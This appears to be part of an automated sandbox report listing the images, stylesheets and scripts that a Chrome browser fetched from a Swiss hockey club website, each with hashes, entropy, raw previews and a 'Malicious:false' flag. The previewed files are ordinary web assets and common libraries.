                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:32/h:32/q:mauto/ig:avif/https://phothockey.ch/wp-content/plugins/gtranslate/flags/32/it.png
                                                                                                                                            Preview:RIFF<...WEBPVP8X..............ALPHL....w`.m.JI!........W....&.@H*....]..d.C..."h!....cD.'.\.E..bT+...C..1.s*....VP8 .........* . .>.8.H%."!7......l..3&.o.. .........I..........i..D..ZI.z.5.1.W.X.A.%.....{...t%....=.H!...5....#..R.1'M.....:^}..M.@f<.B2.<.......~|y.1Q$...l...,D...O..]U.e*.(#......{.q..'E.q..+.2..4.P-...:<.YD..O.....6Z.X....e|U.D.k(@.&....7&.U..Z:.T9......EXIF....Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100.................... ........... .......
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 1361x125, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13827
                                                                                                                                            Entropy (8bit):7.938293528721746
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:FE5DD04CB96E199BD1D63CD1A5511802
                                                                                                                                            SHA1:BD3A2FA65E1D7FCE7482CF04EFAC3AA645D95245
                                                                                                                                            SHA-256:17C3FF4BA2C268450A9B0A03CAB0A8D412FF003B3B29C2B2D0B1470A7AF3C864
                                                                                                                                            SHA-512:C721E77E9A0E8EC25A5BE16D63AC62B509F742A96EE5C4BB1E439B677B7248591505B09A25233176057195648C1C62B388EFDB6C00D34EAE28E40DC67756B9C3
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................Q...........}..........C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......}.Q.."........................................................................(.(&pef.........j...*....p...hH....h..y.......:..3p),%fC..B......6LQ..l)*.R.D1..%@.`..F); ...`...y.....W.9....1. .c. ..pbA......ZaU...V.@..C=.y.x.9..t.....0..&g$X........U..+..@...=6.l`T).\-2.B.[...'E&].....'....%&..8.e...b...*...8WL..p.!bE....'o9=.].. ........E..QK.`MU".r.,.J.F..A...`v\"..R.F.6...=8..N.C.EL...,!...QpB.....0......p<...Z.....Q.c.d.p) ....2:.....I)..AY.;.A\.R..?=9..l.cD.`b(-&..a6..q..0.Te*.....bf.!....Eg'.2.LF...2.....$h...[.x9:0.$LPl........,...- ......D..k+.7Q..r.L(O....8eu&..6QYX.8..&b.br...hL..... ]d.D@..$..V.j.>I.v@.q...u.3.t..c...2`.A.c0R.p.\,.<.1qs
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):17812
                                                                                                                                            Entropy (8bit):7.981771818906158
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:BE182B2582A817752221153C088E56D6
                                                                                                                                            SHA1:C1D8D24724C563049A0AFA215962DD0FC520A77D
                                                                                                                                            SHA-256:E6889CFD70DDCB11F3C36E0CEFBB3C1AC2F2F173EC081A15040A20BCA66E25A2
                                                                                                                                            SHA-512:2DFD96AFCBC2A5007B4A0D7F3ADC5DA73769DD6177E36A8E00432A3D360F3A2CBC877CF6FF636A141820F57D01EC2B02F5D88CCEA43F9E1BAF69124931F19938
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:392/h:272/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/12/IMG_6741.jpg
                                                                                                                                            Preview:RIFF.E..WEBPVP8X..............VP8 .D.......*....>.@.I%..$,..X...fm....zR..i.....j...~?.....zRq.f.......z..........C./...~...|..m.......?....X.....z..b.....)..............n.G.S~...~[.....n.*.....C.W..........G......`Bs._o./...e.N~...^._...z..7......?....u.;.....?.....} ."..#Y... 2`...`..1O.J#M.0...t.q..........f@.....vw.t.x0..|-........\...I.!k....g..o43[<#t....1P..:.m^.,XU.....i.s..\...m..3.J...'.d.<...!.0.+.l.....-.$..Hv.hJ}.......T?...../yPjVO....*...q}l&..%...vD/..5.W.Y..B..X2.)..;..B...Z[..._."./...4.I/.. ....^...:Gw.J.`....L-....Q?..&..C.p].Y..Vt..\<...3$p.D...e.)#...,P,......-.y.</.]..yC.%.....&.S...N..B.....y..d!...E.<..R...(..N..6<..d...J.......z..r........$r.{q.#.S.C~..q8.|..+.tFF........=jd<S..\.I........l.M...l.L%....H.K..i.H.B........w.Y.[..............{...........\1.!.m.......~H...u...>.>S...'.t....96FC8..wp.M.$.U...^...}<....Et.....F,.....BJ...=..g..........e.u...V......Zba1....Q@....6..T.%.v.fk.s.$w..R./"(...l.Rt~.G.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):9394
                                                                                                                                            Entropy (8bit):7.936472624531266
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:01B6872C8B422BCCD594F1AF29399B08
                                                                                                                                            SHA1:2ED304C0C96F68DBFB62894B2B9CCDA140D5E61B
                                                                                                                                            SHA-256:79143610EB7C00ECCEFCB68A8AE9829253B4054D097393B98C7034FAFE2AA782
                                                                                                                                            SHA-512:06D2A197A262AFB37A107924D57D16291988F243E8EB9EAD00251E7C2C0CC17B4C17DD8E4FED7C5CEAA1E75EE3B64DAA1BE713AAE17279B48D54C000B65F8B7D
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:auto/h:auto/q:mauto/ig:avif/https://phothockey.ch/wp-content/uploads/2020/09/frauenfeld.png
                                                                                                                                            Preview:RIFF.$..WEBPVP8X..............ALPHS......m.9....O..CD...`;......m..Z..S5.H.Q......]..1.. .e'.X.m./GN>B..(._............N..N.C./.W.YF.:.2.a3....Yf.....R..=.df8...0.J..kvk.e6p.Yf.3..A%....Q.iX.(..Tr...0.0.a%........Z..0.T.._/7..d.g............K..............QQ.0...p.Z...66.3........T......WP;sT.).....*..qe..P.\WP.Q.Z.k...c..2...:.v&"&.3.....>l.P!....8.?..|p..%...;{..iS&O....~.3F...#m.}~..#.....3....l.j.}...7.u..d.$v...........J...5....;...>.Wp.._:.{..YY.d.H...zc....!Gv3u.s.fM..P.....46....Cn..uj..#.p..R._*S..]2...Q.g+W.*...I..N..e........g.r..jM.7.Q..:Q...z...1.....AS.......2.5.e..*...O..*P.#T...O.)..@..O$$5.|.."|=.F.F..B...]...\')G..o$.).....b.4*.\.HaF...Y.,.P...:......H=..2..S.G.&a..R...\...=).GW..L&..o...-L..KL.....Pm....'..o0.. .F..$.!.2I.ej...&....?3a.....'.&J.+E..v39\./..2!,g)... ..|..~..I..E~....Zu..e...Y.'...._.v\5.OR..6......m.\-..$..q.....:E..........*..&....)Ep.]yD~?.9.V.....C^*.\a.....JW.A..;>].s$...R....(...G.J9^.0~....(Y......U.+.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 392x272, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11367
                                                                                                                                            Entropy (8bit):7.897523172864343
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:A18BDFD2DF6DED1C6CBFFA03F52967F3
                                                                                                                                            SHA1:AE0A89263D1C68449A875FF5E2C5114F2960F0B0
                                                                                                                                            SHA-256:29BCBFE919E24C7A1B10564BD3C358E22B527FED359D634CB9CA721E73C25F3F
                                                                                                                                            SHA-512:A0DC199DF8BE57D4BCEC714DBEA1EDFC518190024F1EABA472CB8833F1346B72FE0B9D009CF8A3D5B07C9ADCF904410881CDD6B5BC6C6C9C13B43F6332309664
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100...........................................C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||............"............................................................................vY.....p.y.l$.....................;..W..Qy^.......:.I1.k.g...........................5.5^...KF169\X..<.+r...6eu...I.............M"Aj.y....rv|..P........l4eT.."5a.C.F$.....j&=......`.......9.9.......>..u..)v.}...........s.P..+'.G$...D.i....~.O......"+..lz......\..c;.5.@.r^.u........7.f...$.r.........B.-.H._.^.......R.w.>7....[}.k.....q.9...5.`.|.......U..".{%FI...dq.~B.ES...z.^.,.........Bi..Te..TsCy.5.x...M.s;.]..............+...dG.Kr.D.....F.aZ.x.g..%..L...... O.;&.B.[..4.nRLA.......Sl.......-.F.qf%.....B-.#...,A..L..w...J.......|]..S....C...;<..xvV
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):10201
                                                                                                                                            Entropy (8bit):4.837561277701459
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:BB1AEB9C7BBFF08FAE9D4BA032594C41
                                                                                                                                            SHA1:6B5CC0AFEACE5761B6FD92FC6870E2F9B4A2643D
                                                                                                                                            SHA-256:C85F828A413187B47732291AD7BFDE324F386507157CA69839D17DAE29D56E21
                                                                                                                                            SHA-512:82D9C8A7194F8700B769075A7E2B17FC9E9ED69B46E0EB4199F48ABB6C8872619FBAE08C9818E3F7EF7635142FBAF78F8168AE5500664EBD833A6CCA9253675F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/social-icons-widget-by-wpzoom/assets/css/academicons.min.css?ver=1732743635
                                                                                                                                            Preview:/*. * Academicons 1.9.2 by James Walsh (https://github.com/jpswalsh) and Katja Bercic (https://github.com/katjabercic). * Fonts generated using FontForge - https://fontforge.org. * Square icons designed to be used alongside Font Awesome square icons - https://fortawesome.github.io/Font-Awesome/. * Licenses - Font: SIL OFL 1.1, CSS: MIT License. */...academicons-ul,..fa-ul {. list-style-type: none.}...academicons-li,..fa-li {. top: .14285714em;. text-align: center.}...academicons-fw,..academicons-li,..fa-fw,..fa-li {. text-align: center.}...ai.fa-pull-left,..fa.fa-pull-left {. margin-right: .3em.}..@font-face {. font-family: Academicons;. src: url(../font/academicons.woff2?v=1.8.7) format('woff2');. font-weight: 400;. font-style: normal;. font-display: block;.}...academicons {. display: inline-block;. font: normal normal normal 14px/1 Academicons;. font-size: inherit;. text-rendering: auto;. -webkit-font-smoothing: antialiased;. -moz-o
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):10884
                                                                                                                                            Entropy (8bit):7.967469290986376
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:EFB65934F385AB9F0D0452B6DE0FE643
                                                                                                                                            SHA1:5E61E39879A7CE2B0EF7E009DC3DA5DB9FE6C39A
                                                                                                                                            SHA-256:C83F4E55F42F79E6242CB388E1405CDFA956766822A4691E5571D23D7455CFBB
                                                                                                                                            SHA-512:19CEABC82BB03C4966A10E7ECC85829562274038533075D9B047E0BE04D87D8A6F3BB8973BB3E2ADA5503FFE1F710E6358E0975EA1F4ECE6B716596CEDCEB3B5
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:392/h:272/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2023/11/Image1.jpg
                                                                                                                                            Preview:RIFF|*..WEBPVP8X..............VP8 .)..P....*....>.D.J%...&.}....cl...?..C..\.d.Q..7.s.i..V.m7.....*/......*c..7(07f;..zz..6.`....D....C.PK.H!...8.W(p;.Z.r.mX.Z...e.t..uz._.v.?.@...F#E4..<.B%=l.....]|w)q......i.o..HJ.R^8.<P}.w^Nx...o..j[....3.%,...Ub..fU..^......8^..PQn.........+.._...zX.1........F......*8....[h~e..s. .5H.0W...8.ET.b...8~.=Y?....K!.m9..F...L...c.V.LX#.....F.L..AT....I%D..|v.....-.B3.S..j..7.".<..Y..t..J5..d....)5.q..o...h....I.*,.p..~...t.p......k...2h.5.....?gC.^...H}.U8..]Je.t:.+..../....G.....`...ST#.8.W.d).....%..`s.......w3.;...Hze.......C....N..[....P..A.g....(>....3&..|l..S..hzH.5.z@..$..}..&^<...^5?...z.?.%Z...W.,..b=t.0P]s'..`.....a.7..YN.(.....NU..CWu..v.2.cQ..'..HY....8...U....8.3G.J......~.q.2.../..&....G3.1.I7-.+.J..nb..7..BO..#...g^...*.Ur..8;D.......'...DJ.&...pj.u..}B..$.Q..._.*...}@7.X..c...Bm..|.<ZWxk...q....Vsd.y..L`..A.s]d.#QU.S.Nd.0..[`.K....>...}...r......2....t...E...>...n.|.u..@......D.9=.Pe..a.......
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3679)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):160622
                                                                                                                                            Entropy (8bit):5.59789393086508
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:B32F9EE49E0DC5279C8B288E91C6B574
                                                                                                                                            SHA1:CC03DB066E2067D3D5BC6BB1C4584C52A6A2C725
                                                                                                                                            SHA-256:AE7720811925CE58E8677B4B656939A9F9D31416DB66091845E021A7C712A5A3
                                                                                                                                            SHA-512:3F7268B87A30998752B6CF252F75D3EBF16097DF32D5ECAA459989E4BC62C2412156676F4F70BCEEC9F002648B80C19195EF1657F1DCDAC713BCA60813923ED2
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:(function(sttc){'use strict';var aa,ba=Object.defineProperty;function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",fa={},ha={};function ia(a,b,c){if(!c||a!=null){c=ha[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ja(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in fa?f=fa:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=ea&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?ba(fa,d,{configurable:!0,writable:!0,value:b}):b!==c&&(ha[d]===void 0&&(a=Math.random()*1E9>>>0,ha[d]=ea?da.Symbol(d):"$jscp$"+a+"$"+d),ba(f,ha[d],{configurable:!0,writable:!0,value:b})))}}ja("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")},"es_nex
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3392
                                                                                                                                            Entropy (8bit):7.84231876461907
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:E43927F03298AB1C6F054A9AC3A71DB6
                                                                                                                                            SHA1:6500F1244BC983ECF040DC865BF5AE0562E6AF3A
                                                                                                                                            SHA-256:26919A7371486DF29B462B83E08F9F770D8EF3B7E677AAAB3F462363ED912E66
                                                                                                                                            SHA-512:2EECA160CECDE031EBC60F1943F84D35DAC2BCFE1C96EF5EBDD606D787E7180D006B85FC778B9AA22C27BDE1890A66F36802306EBC9D7B5B835C4C215BB4A285
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:130/h:90/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/10/v.jpg
                                                                                                                                            Preview:RIFF8...WEBPVP8X...........Y..VP8 X....1...*..Z.>.>.H%."!..m...h.....4.o..^.G..>...y.......Y.....:..........v..!..+...hu.>....G..D._....E.X?0..j..<.u.|....m..'.nh[.s3.d.5c...9yySH........<..|.F'....\.#?v<....l.N.*..}*.O......N......1..#.C.)....}.T...6...T............/..})..g.%.~....w..+.U.7...K...<.{d.Ge...........k.Yqaj3.p.!.....E...\2`..E...d.S)M.Y"I......k.:.....B..(.2.g.l..[.......4.x.Th...(.=mt?x.M.2.......h..../`CW.zG..Z.t.Q&f..f....e.76.&..S.......(..1lj.D.F.e..3kNP.. .|..[Ni.I9....o^.....g....L..dxM....Yf0bj.3.\.Q/.c...7.....c.^...,q'.G..}..Q..l.F..j{.EQMkHN!....:..Ic..G7....;6.B.|.....gWr].p.!.o.l........'Q.....i...&...F?| .1.5r..m.g4,..`.V..~/.!.[...J`a......Z2..H'.K.97.t.0p........\.F.H.D..p.......Q..{......m.....F`.VO..c.....N...f.[.t{..B......AO./U..fq.Y..A..f.n..0o....l..]....J...};...s.zuI.>(.O{._;V...A..5{.s...@"U..5...n5&v..J.x......5>.`.})...k........)..u....HA...?.._.....g....e 03.5.x.nX...........#....fA.N...Cx.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19896
                                                                                                                                            Entropy (8bit):4.4807072143087385
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:B8465833D457DA6899E5BF9BCD7E56B8
                                                                                                                                            SHA1:DA387276D7F05D63CC33F2ACFA0C5E46F122F86F
                                                                                                                                            SHA-256:4C4EF2CE06020123A4263E2AB4BDAE0D2CACCF2E9070A4F82349EC41EA039C45
                                                                                                                                            SHA-512:26615B29F940BC8D01BFA32A068782B0B6E9A0DC3F5A5386D2894BE3AF06569044520EAF263577F341305077AFB7723857FF3CD0A8031A92F61B418A60947930
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:/*!.Waypoints - 4.0.0.Copyright .. 2011-2015 Caleb Troughton.Licensed under the MIT license..https://github.com/imakewebthings/waypoints/blob/master/licenses.txt.*/.(function() {. 'use strict'.. var keyCounter = 0. var allWaypoints = {}.. /* http://imakewebthings.com/waypoints/api/waypoint */. function Waypoint(options) {. if (!options) {. throw new Error('No options passed to Waypoint constructor'). }. if (!options.element) {. throw new Error('No element option passed to Waypoint constructor'). }. if (!options.handler) {. throw new Error('No handler option passed to Waypoint constructor'). }.. this.key = 'waypoint-' + keyCounter. this.options = Waypoint.Adapter.extend({}, Waypoint.defaults, options). this.element = this.options.element. this.adapter = new Waypoint.Adapter(this.element). this.callback = options.handler. this.axis = this.options.horizonta
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (2008)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):13020
                                                                                                                                            Entropy (8bit):5.338335125035746
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:D1F231B50B152372A6C3100F4AED1973
                                                                                                                                            SHA1:1BF10951BE06DA03D1371A904E19C0419F2A3637
                                                                                                                                            SHA-256:9DEC95894AF322B087AB6E87F9C8CE66D849646CF33B375D33C957F4569ED081
                                                                                                                                            SHA-512:00093B7FC4AFFA2D2230622F5D7DA69730246B74620AD4DE30AC64E41FB9AC927AFD2AB426034D71DC85A3DFEE9A46E73DF48DA7E2636A54579EA9AAAC4CAFF6
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ep2.adtrafficquality.google/sodar/sodar2/232/runner.html
                                                                                                                                            Preview:<!DOCTYPE html>.<meta charset=utf-8><script>.(function(){'use strict';function m(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var p=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function aa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var r=aa(this),u=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",v={},w={};function x(a,b,c){if(!c||a!=null){c=w[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}}.function y(a,b,c){if(b)a:{var e=a.split(".");a=e.length===1;var f=e[0],h;!a&&f in v?h=v:h=r;for(f=0;f<e.length-1;f++){var d=e[f];if(!(d in h))break a;h=h[d]}e=e[e.length-1];c=u&&c==="es6"?h[e]:null;b=b(c);b!=null&&(a?p(v,e,{config
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):9574
                                                                                                                                            Entropy (8bit):7.9642746028110345
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:DA97A2598A1CA8DF133E0A810FAEBFCB
                                                                                                                                            SHA1:097ECC6FFEBAB42AE5FA53723AD7C5555DE8D1FB
                                                                                                                                            SHA-256:17852C48D5AE8F1B20E5D9CC5E99D4D0E0D92FDA310CE06F00445788BC6A7B7D
                                                                                                                                            SHA-512:0F1CBE52CB337AA4A13108C0CF890EA192A88F39522C9865C39E32DA08B966FD2DE229CFE346DF03C9FCCF51363E27C9C5A32802DA015ED78ECDD1E03F3297E6
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:auto/h:auto/q:mauto/ig:avif/https://phothockey.ch/wp-content/uploads/2020/03/pub-Y-Schnider.jpg
                                                                                                                                            Preview:RIFF^%..WEBPVP8X........+.....VP8 ~$......*,...>.D.J%..)(.l.@..@.q].........~+.?`....../..`.Z.S...?...}.<t.w.d........V......?......v...l.........c.!...G.....Wd} x..o.B...F.Y..U>....C._.~P...)...]....G..s.H....W>...y..#..?.=........i.w...]..". .Jc/.k.#.Un.....LcD...}.RMU_z..}MLd..!QP.K..u.}.._..A....j.X..~.v.X>4.g.?...$..T.[..wmTUAzJ...p.D8...(.jH.b;^a2e.Q. K....o1|.i..6.b.Y...}...#7.@r*...-f.M7.0...i..Xwzh.2Q5..\......Ay_...9.J....'7.muT..l..J...Y.U....i.M.........X........j..o....q.B..{.X...,J.....q...E...B......#..a..I....#...b.KV.R#.N...s. Ae_j.........D.z<[UX?.OHrr...;&.O.#.[y..a<..F.b.E/.I.A.x...S.g.=Z.....#.f.......gscqD.lk...A... ................H8-D.j......?.)...ky..|..................e|..^.-.E.4P<......'h.2.`.rz../.x.Yk..}...#....QN.,....'..3.....*.=%!.pu.'.\V...e.i....$.....UioSH.2R'.F{-..*x8....~'...'..9rt.E...C.......G*......... 4.}.M..[.\..v.)0,.>.u.x. {.J.......i@U.....;..]...n.b..9.|.zT..,.Cc...c..bU.A./.......R.O..z....Ga(O..L..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (33229)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):33407
                                                                                                                                            Entropy (8bit):4.7584710387647835
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:E35D9C4EBAEA0573DF8E4A9505B72EEA
                                                                                                                                            SHA1:5FBB384CD8CD7A64483E6487D8D8179A633F9954
                                                                                                                                            SHA-256:9F29F2BBB25602F4BDBD3122C317244F8FD9741106FFD5A412574B02EE794993
                                                                                                                                            SHA-512:C571015753B927017B3BEC2B1C0B0103DE27DCC5E805E1DAF8A1459E0F797ABA38FF0592F93CBEC80B98F574B18455DDBC65A1F38A8AED5ACF14EB8CE2D7265C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://use.fontawesome.com/releases/v5.0.0/css/all.css
                                                                                                                                            Preview:/*!. * Font Awesome Free 5.0.0 by @fontawesome - http://fontawesome.com. * License - http://fontawesome.com/license (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-left{float
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 392x272, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22698
                                                                                                                                            Entropy (8bit):7.965107985603246
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:47709A570D0A25CB7D1A1DAB065BA9FF
                                                                                                                                            SHA1:4770F5BF3461FD9F1DA6B0718E847D4643BED4F5
                                                                                                                                            SHA-256:3E06A009D2206D1F40D422F579BB604002B5B7A99A36F5F703CCACF4099DDA7D
                                                                                                                                            SHA-512:8A727AE813E10F52F4D9E17BF114D99BD022D85C1F64230FAC21D25A1F05404D6800E81E4ACAB24EBAF437F924DB4E7801E257529B92FC43A1F1207F5267C3E7
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100...........................................C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||............".................................................................................f.^kdn....)..)....JeC.......~.q.R.L.Tb..]..Z.g.N_...>.ev:.Q-l.{Z!......P....A..;.d[^7.g..~0..L....N9,...!S......Kj.uN.e...k.sA![..}.8..p.R.97.v.M...,..GN...t..S.6..l..k....,.tbG.6g...6z.Q...b.........?..+....V..%...}.).=q....9FI..."...W....Is..V..=.,.G..7:...5.F.[....i}\.K!..e..Y.\.6.6.X..`....I....&..nh..t...Q}C..CN.[d..g(e.<5...&e...1.d.o9......Jm....T...".*T.z..i..]5vI..;..Z.....<..C.......6..[`...Z.l..!...;&.5...uM..+.L.M.-....Q~..]~.up.=..S...L.....R..3J..kog.......J.._>.....|Y...-`...u..!..V..>..:.....Z}GV^5.u9..;..F..j...~.PwH'.tV.2.D
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (331)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):153402
                                                                                                                                            Entropy (8bit):5.037027701602087
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:2353A0DEBAC9559ACD68328961E68842
                                                                                                                                            SHA1:E4EAD8CA52520CEA890D5762000B630AD95BC249
                                                                                                                                            SHA-256:C1A6EE6FC5625655F5A97865B0FF1FAD32D3706C0465623FCDAD3E36E1890861
                                                                                                                                            SHA-512:67993CBCF49FC7A64ED0391F0F18EDA564177C44916148EBD100C6358D3F967D59C20CD8C91AA50CCF7D1E5A9A62CA31265CCF1B84CACA2E9A5F7CD725F8709D
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/themes/colormag-pro/style.css?ver=4.1.12
